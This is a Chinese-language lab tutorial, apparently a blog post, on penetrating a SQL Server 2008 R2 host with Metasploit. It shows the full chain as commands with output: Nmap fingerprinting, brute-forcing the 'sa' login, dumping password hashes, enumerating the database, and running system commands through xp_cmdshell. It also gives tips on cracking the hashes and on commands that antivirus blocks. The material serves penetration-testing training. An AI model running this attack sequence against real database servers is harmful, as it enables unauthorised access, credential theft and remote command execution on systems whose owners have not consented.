数据库渗透(以SQL Server为例)
一、实验环境
攻击机:
kali 2019-3
靶机环境:
装有SQL Server 2008 R2 的Windows10(192.168.1.104)
二、实验步骤
1、使用 Nmap 对 SQL Server 进行踩点
(1)对目标的1433端口进行一次服务侦测来完成对目标系统的SQL Server踩点工作
msf5 > db_nmap -sV -p 1433 192.168.1.104 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 08:41 EDT [*] Nmap: Nmap scan report for 192.168.1.104 [*] Nmap: Host is up (0.011s latency). [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.1600; RTM [*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds msf5 > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.1.104 1433 tcp ms-sql-s open Microsoft SQL Server 2008 R2 10.50.1600; RTM
(2)对UDP端口1434的服务侦测扫描
msf5 > db_nmap -sU -sV -p 1434 192.168.1.104
……
(3)使用Nmap脚本来获取目标数据库的信息
msf5 > db_nmap -sU --script=ms-sql-info -p 1434 192.168.1.104 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 08:56 EDT [*] Nmap: Nmap scan report for 192.168.1.104 [*] Nmap: Host is up (0.00087s latency). [*] Nmap: PORT STATE SERVICE [*] Nmap: 1434/udp open|filtered ms-sql-m [*] Nmap: Host script results: [*] Nmap: | ms-sql-info: [*] Nmap: | 192.168.1.104:1433: [*] Nmap: | Version: [*] Nmap: | name: Microsoft SQL Server 2008 R2 RTM [*] Nmap: | number: 10.50.1600.00 [*] Nmap: | Product: Microsoft SQL Server 2008 R2 [*] Nmap: | Service pack level: RTM [*] Nmap: | Post-SP patches applied: false [*] Nmap: |_ TCP port: 1433 [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds msf5 > db_nmap -sT --script=ms-sql-info -p 1433 192.168.1.104 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-05 08:59 EDT [*] Nmap: Nmap scan report for 192.168.1.104 [*] Nmap: Host is up (0.0011s latency). [*] Nmap: PORT STATE SERVICE [*] Nmap: 1433/tcp open ms-sql-s [*] Nmap: Host script results: [*] Nmap: | ms-sql-info: [*] Nmap: | 192.168.1.104:1433: [*] Nmap: | Version: [*] Nmap: | name: Microsoft SQL Server 2008 R2 RTM [*] Nmap: | number: 10.50.1600.00 [*] Nmap: | Product: Microsoft SQL Server 2008 R2 [*] Nmap: | Service pack level: RTM [*] Nmap: | Post-SP patches applied: false [*] Nmap: |_ TCP port: 1433 [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.26 seconds
2、暴力破解密码
对应模块auxiliary/scanner/mssql/mssql_login ,依据提示设置相应爆破字典,run即可。
示例:
msf5 > use auxiliary/scanner/mssql/mssql_login msf5 auxiliary(scanner/mssql/mssql_login) > show options Module options (auxiliary/scanner/mssql/mssql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port (TCP) STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) VERBOSE true yes Whether to print output for all attempts msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.104 rhosts => 192.168.1.104 msf5 auxiliary(scanner/mssql/mssql_login) > set username sa #默认账户名基本都是 sa username => sa msf5 auxiliary(scanner/mssql/mssql_login) > set password 123456 #这里偷个懒,一般情况是需要对 pass_file 参数指定密码字典的 password => 123456 msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10 #线程数 threads => 10 msf5 auxiliary(scanner/mssql/mssql_login) > run [*] 192.168.1.104:1433 - 192.168.1.104:1433 - MSSQL - Starting authentication scanner. [+] 192.168.1.104:1433 - 192.168.1.104:1433 - Login Successful: WORKSTATION\sa:123456 [*] 192.168.1.104:1433 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
3、捕获服务器的口令
对应模块:auxiliary/scanner/mssql/mssql_hashdump,操作如下:
msf5 > use auxiliary/scanner/mssql/mssql_hashdump msf5 auxiliary(scanner/mssql/mssql_hashdump) > show options Module options (auxiliary/scanner/mssql/mssql_hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port (TCP) TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" THREADS 1 yes The number of concurrent threads USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf5 auxiliary(scanner/mssql/mssql_hashdump) > set rhosts 192.168.1.104 rhosts => 192.168.1.104 msf5 auxiliary(scanner/mssql/mssql_hashdump) > set password 123456 password => 123456 msf5 auxiliary(scanner/mssql/mssql_hashdump) > set threads 10 threads => 10 msf5 auxiliary(scanner/mssql/mssql_hashdump) > run [*] 192.168.1.104:1433 - Instance Name: nil [+] 192.168.1.104:1433 - Saving mssql05 = sa:0100daf63…… [+] 192.168.1.104:1433 - Saving mssql05 = ##MS_PolicyEventProcessingLogin##:0100a8df1bd75…… [+] 192.168.1.104:1433 - Saving mssql05 = ##MS_PolicyTsqlExecutionLogin##:0100b5e6b…… [+] 192.168.1.104:1433 - Saving mssql05 = admin:0100f72e3d144e12782…… [+] 192.168.1.104:1433 - Saving mssql05 = coach:010060e…… [+] 192.168.1.104:1433 - Saving mssql05 = student:01004ac65…… [*] 192.168.1.104:1433 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/mssql/mssql_hashdump) >
- 可以使用第三方工具来对这些哈希值进行破解
4、浏览 SQL Server
利用已取得的目标数据库的用户名和密码。登录到这个服务器上从该数据库收集重要的信息,比如存储过程、数据库的数量和名称、可登录到数据库的Windows组、数据库中的文件以及一些参数。
对应模块:auxiliary/admin/mssql/mssql_enum,操作如下(run之后的结果是有所省略的):
msf5 > use auxiliary/admin/mssql/mssql_enum msf5 auxiliary(admin/mssql/mssql_enum) > show options Module options (auxiliary/admin/mssql/mssql_enum): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port (TCP) TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf5 auxiliary(admin/mssql/mssql_enum) > set password 123456 password => 123456 msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 192.168.1.104 rhosts => 192.168.1.104 msf5 auxiliary(admin/mssql/mssql_enum) > run [*] Running module against 192.168.1.104 [*] 192.168.1.104:1433 - Running MS SQL Server Enumeration... [*] 192.168.1.104:1433 - Version: [*] Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) [*] Apr 2 2010 15:48:46 [*] Copyright (c) Microsoft Corporation [*] Enterprise Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) [*] 192.168.1.104:1433 - Configuration Parameters: [*] 192.168.1.104:1433 - C2 Audit Mode is Not Enabled [*] 192.168.1.104:1433 - xp_cmdshell is Enabled [*] 192.168.1.104:1433 - remote access is Enabled [*] 192.168.1.104:1433 - allow updates is Not Enabled [*] 192.168.1.104:1433 - Database Mail XPs is Not Enabled [*] 192.168.1.104:1433 - Ole Automation Procedures are Not Enabled [*] 192.168.1.104:1433 - Databases on the server: [*] 192.168.1.104:1433 - Database name:master [*] 192.168.1.104:1433 - Database Files for master: [*] 192.168.1.104:1433 - D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\master.mdf [*] 192.168.1.104:1433 - D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\mastlog.ldf [*] 192.168.1.104:1433 - Database name:tempdb [*] 192.168.1.104:1433 - Database Files for tempdb: [*] 192.168.1.104:1433 - D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\tempdb.mdf [*] 192.168.1.104:1433 - D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\templog.ldf ………… [*] 192.168.1.104:1433 - System Logins on this Server: [*] 192.168.1.104:1433 - sa [*] 192.168.1.104:1433 - ##MS_SQLResourceSigningCertificate## ………… [*] 192.168.1.104:1433 - coach [*] 192.168.1.104:1433 - student [*] 192.168.1.104:1433 - Disabled Accounts: [*] 192.168.1.104:1433 - ##MS_PolicyEventProcessingLogin## [*] 192.168.1.104:1433 - ##MS_PolicyTsqlExecutionLogin## [*] 192.168.1.104:1433 - No Accounts Policy is set for: [*] 192.168.1.104:1433 - All System Accounts have the Windows Account Policy Applied to them. [*] 192.168.1.104:1433 - Password Expiration is not checked for: [*] 192.168.1.104:1433 - sa ………… [*] 192.168.1.104:1433 - coach [*] 192.168.1.104:1433 - student [*] 192.168.1.104:1433 - Windows Logins on this Server: [*] 192.168.1.104:1433 - NT AUTHORITY\SYSTEM ………… [*] 192.168.1.104:1433 - Windows Groups that can logins on this Server: [*] 192.168.1.104:1433 - NT SERVICE\MSSQLSERVER [*] 192.168.1.104:1433 - NT SERVICE\SQLSERVERAGENT [*] 192.168.1.104:1433 - Accounts with Username and Password being the same: [*] 192.168.1.104:1433 - No Account with its password being the same as its username was found. [*] 192.168.1.104:1433 - Accounts with empty password: [*] 192.168.1.104:1433 - No Accounts with empty passwords where found. [*] 192.168.1.104:1433 - Stored Procedures with Public Execute Permission found: [*] 192.168.1.104:1433 - sp_replsetsyncstatus [*] 192.168.1.104:1433 - sp_replcounters [*] 192.168.1.104:1433 - sp_replsendtoqueue [*] 192.168.1.104:1433 - sp_resyncexecutesql [*] 192.168.1.104:1433 - MSSQLSERVER [*] 192.168.1.104:1433 - Default Server Instance SQL Server Service is running under the privilege of: [*] 192.168.1.104:1433 - NT AUTHORITY\NETWORKSERVICE [*] Auxiliary module execution completed msf5 auxiliary(admin/mssql/mssql_enum) >
- 注意观察执行结果,会得到许多有用信息。
5、后渗透/执行系统命令
(1)对应模块
第一个要使用的模块是mssql_exec,它可以启用已经被禁用的xp_cmdshell,从而允许执行系统级的命令。
第二个要使用的模块是mssql_sql,凭借它将可以在数据库上运行SQL查询。
…………
(2)重新载入xp_cmdshell功能
模块mssql_exec将会通过重新载入禁用的xp_cmdshell功能来运行系统级的命令。这个模块需要设置要执行的系统命令的CMD选项。
示例:
msf5 > use auxiliary/admin/mssql/mssql_exec msf5 auxiliary(admin/mssql/mssql_exec) > show options Module options (auxiliary/admin/mssql/mssql_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port (TCP) TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.1.104 rhosts => 192.168.1.104 msf5 auxiliary(admin/mssql/mssql_exec) > set password 123456 password => 123456 msf5 auxiliary(admin/mssql/mssql_exec) > set cmd 'ipconfig' cmd => ipconfig msf5 auxiliary(admin/mssql/mssql_exec) > run [*] Running module against 192.168.1.104 [*] 192.168.1.104:1433 - SQL Query: EXEC master..xp_cmdshell 'ipconfig' output ------ Windows IP M�n �e�~@\�WQ�M�hV ,g0Wޏ�c* 3: �ZSO�r` . . . . . . . . . . . . : �ZSO�]�e_ޏ�c ޏ�cyr�[�v DNS T . . . . . . . : �e�~@\�WQ�M�hV ,g0Wޏ�c* 4: �ZSO�r` . . . . . . . . . . . . : �ZSO�]�e_ޏ�c ޏ�cyr�[�v DNS T . . . . . . . : �N*YQ�M�hV VMware Network Adapter VMnet1: ޏ�cyr�[�v DNS T . . . . . . . : ,g0W���c IPv6 0W@W. . . . . . . . : fe80::b5b6:426f:907c:7d60%5 IPv4 0W@W . . . . . . . . . . . . : 192.168.10.1 P[Q�cx . . . . . . . . . . . . : 255.255.255.0 ؞��QsQ. . . . . . . . . . . . . : �N*YQ�M�hV VMware Network Adapter VMnet8: ޏ�cyr�[�v DNS T . . . . . . . : ,g0W���c IPv6 0W@W. . . . . . . . : fe80::d9b4:73e0:7e23:87df%8 IPv4 0W@W . . . . . . . . . . . . : 10.10.10.1 P[Q�cx . . . . . . . . . . . . : 255.255.255.0 ؞��QsQ. . . . . . . . . . . . . : �e�~@\�WQ�M�hV WLAN: ޏ�cyr�[�v DNS T . . . . . . . : ,g0W���c IPv6 0W@W. . . . . . . . : fe80::6941:409f:25c4:4914%14 IPv4 0W@W . . . . . . . . . . . . : 192.168.1.104 P[Q�cx . . . . . . . . . . . . : 255.255.255.0 ؞��QsQ. . . . . . . . . . . . . : 192.168.1.1 �N*YQ�M�hV �N*YQ 3: �ZSO�r` . . . . . . . . . . . . : �ZSO�]�e_ޏ�c ޏ�cyr�[�v DNS T . . . . . . . : [*] Auxiliary module execution completed
注意:目标系统如果安装有安全软件,部分命令会被拦截,如:net user 被360拦截
(3)运行SQL查询命令
可以使用mssql_sql模块对目标数据库服务器执行SQL查询命令。你只需将SQL参数的值设定为一条有效的数据库查询命令,这条命令就会被执行。
以查询数据库版本为例
msf5 > use auxiliary/admin/mssql/mssql_sql msf5 auxiliary(admin/mssql/mssql_sql) > show options Module options (auxiliary/admin/mssql/mssql_sql): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port (TCP) SQL select @@version no The SQL query to execute TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf5 auxiliary(admin/mssql/mssql_sql) > set rhosts 192.168.1.104 rhosts => 192.168.1.104 msf5 auxiliary(admin/mssql/mssql_sql) > set password 123456 password => 123456 msf5 auxiliary(admin/mssql/mssql_sql) > run [*] Running module against 192.168.1.104 [*] 192.168.1.104:1433 - SQL Query: select @@version [*] 192.168.1.104:1433 - Row Count: 1 (Status: 16 Command: 193) NULL ---- Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) [*] Auxiliary module execution completed
三、参考文献
《精通Metasploit渗透测试》
不忘初心,方得始终。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?